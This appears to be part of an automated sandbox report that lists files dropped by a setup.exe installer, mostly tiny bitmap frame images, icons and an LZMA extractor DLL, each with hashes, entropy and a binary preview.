                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 3 x 3 x 24, image size 38, resolution 3778 x 3778 px/m, cbSize 92, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                            Entropy (8bit):2.4736059384431
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:k6llllDlxTolR9WZfA1n:k6l1rol7u41n
                                                                                                                                                                            MD5:0EDD17E9905D463CE23FBAE64563C8DA
                                                                                                                                                                            SHA1:2C26D30E1B7A5761F5048D9494349CAFE40979D9
                                                                                                                                                                            SHA-256:237E098ED029198E9F7CFE71BABD6BF9FF3962ED78A263DC7426EA663E601467
                                                                                                                                                                            SHA-512:FC358AD0F2E482AD51AF201F2883259DFCF0D577DB1BE8CFF2B9048F22827278CF0CB8A3F76475222D86BE7E945CE9B34AA9B86FC625C908FFAEA0AD6B1EA2C2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BM\.......6...(...................&....................M..M..M.....M.........M....~?.....

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_left_inactive.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 3 x 3 x 24, image size 38, resolution 3778 x 3778 px/m, cbSize 92, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                            Entropy (8bit):2.4736059384431
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:k6llllDlxToltIAlll:k6l1roliAll
                                                                                                                                                                            MD5:1B38EF93DF0C5D4C6C2A10CA0115A28D
                                                                                                                                                                            SHA1:17FA1779A66696F9EE1406DA73133745EB4429DD
                                                                                                                                                                            SHA-256:4292EA3565B63946777D999352A1986E8F5950F1E8E51F030443F05DBDBDE57D
                                                                                                                                                                            SHA-512:1B0B3C6FE0F359AE383D3D5B069341A900AFF610E91D7752D4290FAFE11AC73DFF3CA349DEB6599A6D358ADD4C769AE6CB05C2B751DBBCE738BAE4082167E8E4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BM\.......6...(...................&....................M..M..M.....M.........M...........

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_mid.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 1 x 3 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):68
                                                                                                                                                                            Entropy (8bit):2.192775525356426
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:84lul0lblxBrul/n:84luKRm/n
                                                                                                                                                                            MD5:445B2B911B105CED9B1A3A5CAAA594DD
                                                                                                                                                                            SHA1:C326010A040A6D19837360907745A7A05982254F
                                                                                                                                                                            SHA-256:ECFC46E3BA63CC8D7DE04134A271B171D9EFD714E4CE9611115836A5B4518E63
                                                                                                                                                                            SHA-512:1DED63A90006BD2BFDDB1DE399D0CB483E52A94113E43B3099B6BF3DC7A9A0C7AE74249EBAA600D0D184615661F2FF557B62ED65F073BFAEFC4F84E0CB420360
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BMD.......6...(........................................M......~?...

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_mid_inactive.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 1 x 3 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):68
                                                                                                                                                                            Entropy (8bit):2.192775525356426
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:84lul0lblxs7l:84luKYl
                                                                                                                                                                            MD5:7610648B8E31404E1621A7A5B510B86D
                                                                                                                                                                            SHA1:D51D517A8472BFE40C469AFA8869385D5A0E9783
                                                                                                                                                                            SHA-256:48837B62A6A6BC71359FF74BBE8A672D6B23CC30344C12E006698F069890A2B3
                                                                                                                                                                            SHA-512:24B03969FD28DE9919D86609BEC03E6ED732ED78B8E0DE3F2FE5253180817D1471E3ED004ABB5ECD91885B6281CEF1B8E508E38E6F76FDCFB88A29E308AC78DD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BMD.......6...(........................................M...........

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_right.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 3 x 3 x 24, image size 38, resolution 3778 x 3778 px/m, cbSize 92, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                            Entropy (8bit):2.4736059384431
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:k6llllDlxToljolT1Evn:k6l1rolj4ZEv
                                                                                                                                                                            MD5:C288357164D52B2CFD695C792074323B
                                                                                                                                                                            SHA1:C8B7B1DDB78C929AD56D8BBD57FF5449AFA04BE3
                                                                                                                                                                            SHA-256:709D6FDBE00694F7DC115E923188F62CDC72D39E739280A1AFF072D1A49D2674
                                                                                                                                                                            SHA-512:8D07E5C163C9E4B0D04A861E00BE1F578D7A77C2F3EBA80DEB3895B2B354D4015FF1905A2DFCDCCC1B8EC839359DCC302E09F753623AA7F0DF212540CE8A56B2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BM\.......6...(...................&....................M..M..M.........M.....~?...M......

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_right_inactive.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 3 x 3 x 24, image size 38, resolution 3778 x 3778 px/m, cbSize 92, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                            Entropy (8bit):2.4736059384431
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:k6llllDlxTolYByoYQoXn:k6l1rolYB+
                                                                                                                                                                            MD5:2C84C848BBCD7BD57579D3431E8A363A
                                                                                                                                                                            SHA1:5DC73F68798E73318D03979810BC00A4E94956D9
                                                                                                                                                                            SHA-256:F212B152D4647EDCD36D2218713296AFBF9AC5E86965C309DF8F245FB89A06E3
                                                                                                                                                                            SHA-512:5AF2BFF30850458EF08340FE4EF9AE9E78D5AE1124C3A9DD365B6DD0E97A30BA079E466EC7F127485F5A89BE7350D27371FEE665B9D6214CD94532ED346EFFA3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BM\.......6...(...................&....................M..M..M.........M..........M......

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_caption.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 1 x 22 x 24, image size 90, resolution 3778 x 3778 px/m, cbSize 144, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):144
                                                                                                                                                                            Entropy (8bit):4.230902217075131
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:3l7lsl9/lp1bcNHTlFRQhXWl5+la9JeC2elq12xSpFvqsCll:3lhslfp0zlEBW6QAelPUvSll
                                                                                                                                                                            MD5:A8A4420FBE5DBE8FFF5A4457FBDC0923
                                                                                                                                                                            SHA1:4475046BF4A5B7AF62099521D2A28DF47EB14FC8
                                                                                                                                                                            SHA-256:4E504366B5A0B48020EE2E29BEB17092010CEDB50CAA9A901BD6B2E921803582
                                                                                                                                                                            SHA-512:DAC1A4FCE6A95B965259EB7B92FA73BF532F3F2AF929D5930538E16A2BAB40D58384EA924CE63DAC9235CB6E5585171A21B835EC2B2E359091BB2C7861263BC4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BM........6...(...................Z....................|=..|=..|=..|=..{=..z;..y:..x9..v7..t5..r3..p1..n/..l-..j+..h)..f'..d%..b#..`!.._ ..]....

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_caption_inactive.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 1 x 22 x 24, image size 90, resolution 3778 x 3778 px/m, cbSize 144, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):144
                                                                                                                                                                            Entropy (8bit):4.1919463804470976
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:3l7lsl9/lhCqZ7tOCUJfL9ozJ1ru+PfwS/ln:3lhslfhCiICLzru+Qil
                                                                                                                                                                            MD5:3D8494DD57AE17B57726E6530FC60237
                                                                                                                                                                            SHA1:09B19EE5FC72B2A07452ED242983C464E2ED5EB0
                                                                                                                                                                            SHA-256:196BF30CC41139CCAECB41584FCDC4A61842C246F81A3C7C4A6BA2A5BEA4038C
                                                                                                                                                                            SHA-512:3E02E2C06C922FF58C7A6BB9E6B320E7E9A1DC70CD283986657B02ECECF41219454A1D64B5FC02733744F1A2D31B507691B6854E362639FF943AD5E719238343
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BM........6...(...................Z.....................................~...|...z...x...u...r...o...l...i...e...b...^...[...X...U...R...O...M...

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_left.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 3 x 1 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):68
                                                                                                                                                                            Entropy (8bit):2.192775525356426
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:86llflFlblxVA1n:86ltti1n
                                                                                                                                                                            MD5:78E5ADEF0E9078C2A76DDEA85C1C4DC4
                                                                                                                                                                            SHA1:8DA1ED8372EEA6F5CE10154A52B5BD9BCBF1CC18
                                                                                                                                                                            SHA-256:84CF7696E5B73513BCF78B1611DE3FAC76E9F99CF9112DD9EA963850441B62FE
                                                                                                                                                                            SHA-512:A1F6EE057AD820EE4FE4BB9B9C7703DA8BB9E47109EE384E828E6CB16CAB7FC9A258E39D413FFDF40CA51E2275737F0B68ACD32CF7C6577EE9D7740069A3DA07
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BMD.......6...(........................................M....~?.....

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_left_inactive.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 3 x 1 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):68
                                                                                                                                                                            Entropy (8bit):2.192775525356426
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:86llflFlblxElll:86lttcll
                                                                                                                                                                            MD5:39CBD0B2CF89509C50EE74963F89F70D
                                                                                                                                                                            SHA1:777755CB3E7EAC9F8377552820DEC7BF9D48FBFB
                                                                                                                                                                            SHA-256:A46D900FB1D3BA41E6F608587F4A4A414314F48A56CDCA10716491415D38A07F
                                                                                                                                                                            SHA-512:8D4486150F12CF144D242735C9940C296DEAFFFA4FD92029909F7B402C4F26F7B3E8AE9F2DFA5518EDF5C8BFB6B622B6CBE3CD6EF39C4EC40EB601F3C51B310D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BMD.......6...(........................................M...........

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_right.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 3 x 1 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):68
                                                                                                                                                                            Entropy (8bit):2.192775525356426
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:86llflFlblxNpt1n:86lttdH1
                                                                                                                                                                            MD5:2E805B0982CDA361E322E201DF8CCEFF
                                                                                                                                                                            SHA1:A199D51AAC3AC44C62B7CF9AFAE22EEA7932C63B
                                                                                                                                                                            SHA-256:C3F2A56930697C4DB1EA99BAD9F20D7B750F5795181A63EB608C57B7643EDD22
                                                                                                                                                                            SHA-512:DADE5A2DEC58631D4F88129012AE941465397FB498EA52010B2C3ABD1E7130D73D47C78BBEA0A600B868BD655C2E2B1A141D683B20C7C01099F8E8F116659785
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BMD.......6...(........................................|=...M......

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_right_inactive.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 3 x 1 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):68
                                                                                                                                                                            Entropy (8bit):2.192775525356426
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:86llflFlblxilQoXn:86lttyx
                                                                                                                                                                            MD5:171E23CD227D985B89098C5CC632C144
                                                                                                                                                                            SHA1:2349ECA4F92E1D4DCC2D47BC3D166A7081A5485B
                                                                                                                                                                            SHA-256:C9D87FC1E021CAF801E31E1359D3A13E1DA0C484E3A21EA173D352F924E1A924
                                                                                                                                                                            SHA-512:D9AE5802B331B6B8F38E129BD1E4E07270B7469DF2DDD627EF0D6DC7F1CF33F87C334DE00BA35C3033108876291C67AEFBF7B34B9434FAA42C79A2AAE6B4F036
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BMD.......6...(.............................................M......

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_left.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 6 x 25 x 24, image size 502, resolution 3779 x 3779 px/m, cbSize 556, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):556
                                                                                                                                                                            Entropy (8bit):5.636769477117101
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:alUYK/K/K/KJV7BqrXeursG8FFGaKxLneC2zvNiO9bpOOEbQ8ep:a2YEEECboOHGc7KNnoNpppEb0p
                                                                                                                                                                            MD5:D4757DA90BF3A96D5CA1B7D8FEDF0A1F
                                                                                                                                                                            SHA1:C4BE7503191C6926AD33853B05CC43AD87A6B1E8
                                                                                                                                                                            SHA-256:0E8B86D175526133E239A0A4DC6308C6B529D9B2DB2E469CE5098A39F3432168
                                                                                                                                                                            SHA-512:B0FA9AC1B48E4C2D9E4289A65A4F8D46EDEAAA5D43309089D67778CE72C72F2E352A792B10C24146C75E604F83158E5B0E665FC70DF9886DFD4128F4B1FB2471
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BM,.......6...(........................................M....~?.|=.|=.|=...M....~?.|=.|=.|=...M....~?.|=.|=.|=...M....~?.|=.|=.|=...M....}?.{=.{=.{=...M....|=.z;.z;.z;...M....{<.y:.y:.y:...M....z;.x9.x9.x9...M....x9.v7.v7.v7...M....v7.t5.t5.t5...M....t5.r3.r3.r3...M....r3.p1.p1.p1...M....p1.n/.n/.n/...M....n/.l-.l-.l-...M....l-.j+.j+.j+...M.....j,.h).h).h)...M.....h*.f'.f'.f'...M.....f(.d%.d%.d%...M...|.g*.b#.b#.b#...M...l.u>.`!.`!.`!......M...~._ ._ ._ ......M...r..h.]..]..........M...p..|.xD............M..M...b..................M.....

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_left_inactive.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 6 x 25 x 24, image size 502, resolution 3779 x 3779 px/m, cbSize 556, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):556
                                                                                                                                                                            Entropy (8bit):5.618119058335867
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:alUIVR4LoFqwT5LRa7VCupDZWOGYahgxMO+:a2IR4LrkL8YuFZrtr+
                                                                                                                                                                            MD5:DF94017171D579959895EDC072D39120
                                                                                                                                                                            SHA1:0C0FACCEAFAC06C603F125CC170973851796D961
                                                                                                                                                                            SHA-256:706D0EC93AB304F05F6D3B8B9DA613CA404943E9DBFF9061984B5417F15711F8
                                                                                                                                                                            SHA-512:2576993C63B702EE9C6428A7D2698F94D6B7AFB5277B60A0F51979AB7494651EA68ED46C0448A6F7D6954455AEC9DCF17755CF20E666A7267197ADFD4D162A74
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BM,.......6...(........................................M..................M..................M..................M..................M........~..~..~...M.....~..|..|..|...M.....|..z..z..z...M.....z..x..x..x...M.....w..u..u..u...M.....t..r..r..r...M.....q..o..o..o...M.....n..l..l..l...M......k..i..i..i...M.....g..e..e..e...M.....d..b..b..b...M.....`..^..^..^...M.....]..[..[..[...M.....Z..X..X..X...M.....Z..U..U..U...M......h..R..R..R......M.....O..O..O......M.........M..M.........M........m............M..M...v..................M.....

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_mid.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 1 x 3 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):68
                                                                                                                                                                            Entropy (8bit):2.192775525356426
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:84lul0lblxAtKX:84luKqKX
                                                                                                                                                                            MD5:440363D27344241CF3574CDC43CCA3D5
                                                                                                                                                                            SHA1:CDEB4F94AE64C5BBE4740C3773E9EA8C8502CAC2
                                                                                                                                                                            SHA-256:358FE1E6B51DD850C2463506D20D341B6AC09194CE0844734CD5386A4D82692B
                                                                                                                                                                            SHA-512:4F7EDEE0F1E294995785F792ED03B74991C8CF8A750E996477FC8590E0645187FE9201BC4847CB4FCB790BDAFF0BA29C4FDC7F7A088180514583EB3FDA29C58D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BMD.......6...(........................................^ ...{..M....

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_mid_inactive.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 1 x 3 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):68
                                                                                                                                                                            Entropy (8bit):2.152262473854022
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:84lul0lblx5+4l:84luK04l
                                                                                                                                                                            MD5:FC284F137A181D626CBFB9B980265A14
                                                                                                                                                                            SHA1:AF1DC42B8706F65E80B5AA021DA38E7C48BF5AC5
                                                                                                                                                                            SHA-256:EBF14004ABB9171EFB791D5ED78D6F028F09775EC047BFE2BD9A3AD4DC431A0C
                                                                                                                                                                            SHA-512:AAB8700806A42877B1B09379A606D49426CD0FA62C0856CC64BCCFEC6ED1E67130A908FB8D4FEBA6C6D1B8D530A5ACB380FAD9D6ED1A170103D3A90A35A788FD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BMD.......6...(.........................................M.....M....

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_right.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 6 x 25 x 24, image size 502, resolution 3779 x 3779 px/m, cbSize 556, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):556
                                                                                                                                                                            Entropy (8bit):5.484479797867763
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:alUzav1+uv1+uv1+uv1+5wenBOdgsNsC/lY8G4/Kg83RroZoL/0MSiOG0Jj0/BeO:a23fff5weBOXr7/Kg83CSXOG0JI/BeHu
                                                                                                                                                                            MD5:50656C6F33CB1490EEE92CFCF2F4FA80
                                                                                                                                                                            SHA1:CA5A3FE9B1F6130E6452CEDF5D3734781F6E150B
                                                                                                                                                                            SHA-256:EF8FC7A18AF77FED42BF20FD640543B0CFAF312A4C9DFC0C2F35CE1AF9AE58E9
                                                                                                                                                                            SHA-512:B8E2E2945FCB5699E063BFDAD3FC6AE72BE96BF342883DC60B8AC81C4143888AA23CCF237B935F56B5F586AFE4772EDA39B443E0797385ED358638CB7052EEC6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BM,.......6...(........................................|=.|=.|=.|=...M....|=.|=.|=.|=...M....|=.|=.|=.|=...M....|=.|=.|=.|=...M....{=.{=.{=.{=...M....z;.z;.z;.z;...M....y:.y:.y:.y:...M....x9.x9.x9.x9...M....v7.v7.v7.v7...M....t5.t5.t5.t5...M....r3.r3.r3.r3...M....p1.p1.p1.p1...M....n/.n/.n/.n/...M....l-.l-.l-.l-...M....j+.j+.j+.j+...M....h).h).h).h)....M....f'.f'.f'.f'....M....d%.d%.d%.d%....M....b#.b#.b#.b#....M....`!.`!.`!.r:..n.M...._ ._ ._ ..~.M.......]..]...h..r.M.......{H..|..m.M...........a.M..M.............M....................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_right_inactive.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 6 x 25 x 24, image size 502, resolution 3779 x 3779 px/m, cbSize 556, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):556
                                                                                                                                                                            Entropy (8bit):5.599477820967879
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:alUPuuuxqOeayLeVnA1TbHusQA+RgZpEH8An1s:a2oqO2fHusQpIE5nK
                                                                                                                                                                            MD5:4178D84D2CD986063D2A7C91C57295D2
                                                                                                                                                                            SHA1:FC5EA9402CD9C325716A2B79D070AC3E756C9F2F
                                                                                                                                                                            SHA-256:5365B988C102E46F73418EC36E0DE5B1749C2080C3D2DA660C507A9C505F333E
                                                                                                                                                                            SHA-512:ACA1CA7E16049ADF1B26DC8D26E99461069FD133587E748012347E66EEF9BDB90FDA0D197C86334667CC04B0289CFBE8FE8727EABF3BDE9827A1066A71133A32
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:BM,.......6...(......................................................M..................M..................M..................M.....~..~..~......M.....|..|..|..~...M.....z..z..z..|...M.....x..x..x..z...M.....u..u..u..w...M.....r..r..r..t...M.....o..o..o..q...M.....l..l..l..n...M.....i..i..i..k....M.....e..e..e..g...M.....b..b..b..d...M.....^..^..^..`...M.....[..[..[..]...M.....X..X..X..Z...M.....U..U..U..Z...M.....R..R..R..h....M.....O..O..O...M........M..M......M........i......M...........z.M..M.............M....................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\info

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):3.347251063198798
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:+h7OMtMrJbDG0UDLHMrhmZ1galQpAAAAAAAAAAAS55qjOlr9n:+6g0uyi1ZQpAAAAAAAAAAASXqjOp9n
                                                                                                                                                                            MD5:8595D2A2D58310B448729E28649443D6
                                                                                                                                                                            SHA1:08C1DF6FBF692F21157B2276EB1988AC732FF93C
                                                                                                                                                                            SHA-256:27F13C4829994B214BB1A26EEF474DA67C521FD429536CB8421BA2F7C3E02B5F
                                                                                                                                                                            SHA-512:AE409B8F210067AC194875E8EBF6A04797DF64FA92874646957B2213FB4A4F7DA2427EF1ED8D35CD2832B2A065E050298BAC0FC99C2A81DE4A569A417C2A1037
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%.....................................................................................................................{...............................................................................................................................................................................................rqr............................................................................................................................................................................................rqr............................................................................................................................................................................................tst............................................................................................................................................................................}................yxy...................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\insticon

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):3.9105220993102248
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:+7d0iiiiiiiuiiiiiiiZiiiiii0DMiiiiiiZiiiiiPiiiiiDfiiiiiMiiiii1Ji3:+TB4Gds1E2fVE5MF+mJwnwewO
                                                                                                                                                                            MD5:EAC3781BA9FB0502D6F16253EB67B2B4
                                                                                                                                                                            SHA1:5EFF4FCDC405732702432008AB43164CA6F37101
                                                                                                                                                                            SHA-256:F864E8640C98B65C6C1B9B66A850661E8397ED6E66B06F4424396275488AF1BE
                                                                                                                                                                            SHA-512:D108687995B5B02778FC7ACF3A66706E761103B1EE47305D852BF9A190BDF1722B4C6277A13B65BDAD9F4E3F92406F5C7B1B06444D1493F2D4B1AAEAF4176E06
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%....................................................................................................x...t..f..f..t.....x...".......................................................................................................................................................d................................d...........................................................................................i...N...N...N...N...N...N...N...N...N..S...`.....s.k................................................j....Z.................................................................................N.......................................N.......d..........................................................d...s.............................................................................N......................................If...c..................................................................d....X..

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\lzmaextractor.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):22848
                                                                                                                                                                            Entropy (8bit):6.8705781741307765
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:iOw0cxp5wbrBgrjrI/ehLI/ehDvZYLX2Ip4kR4qjdAA1m5wMPhzmubmm+ccP:iOAxMVTacaDRYT2Ip484qxf1mlZxbWP
                                                                                                                                                                            MD5:9D67E3BE4D83160D24FEE65F6E1868E5
                                                                                                                                                                            SHA1:9AED13C010F24C6888DA91D883A1A31AC45E029A
                                                                                                                                                                            SHA-256:4FC58D819A4BC75CB8170192E34FDB17E31C38831A7230ED0E03A30EB38CCF9D
                                                                                                                                                                            SHA-512:73AF8E17FA6C949FFB0861118A10B362DEA4A236B60912497E8F97C75CC8EBE3CDDBC8018A4E8CF24B539DA6122790FDB081CF4B68C59197EC579E13191372EB
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: Typora#U5b89#U88c5#U52a9#U624b.exe, Detection: malicious, Browse
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u9X..jX..jX..j...kW..jX..jh..jA..k]..jA..kY..jA..jY..jX..jY..jA..kY..jRichX..j........................PE..L...>>.d.........."!...$............@........ ...............................`......n.....@.........................P".......$.......@..h...............@=...P..\....!..p............................................ ..X............................text...)........................... ..`.rdata..X.... ......................@..@.data........0......................@....rsrc...h....@......................@..@.reloc..\....P......................@..B................................................................................................................................................................................................................................................................................................................................

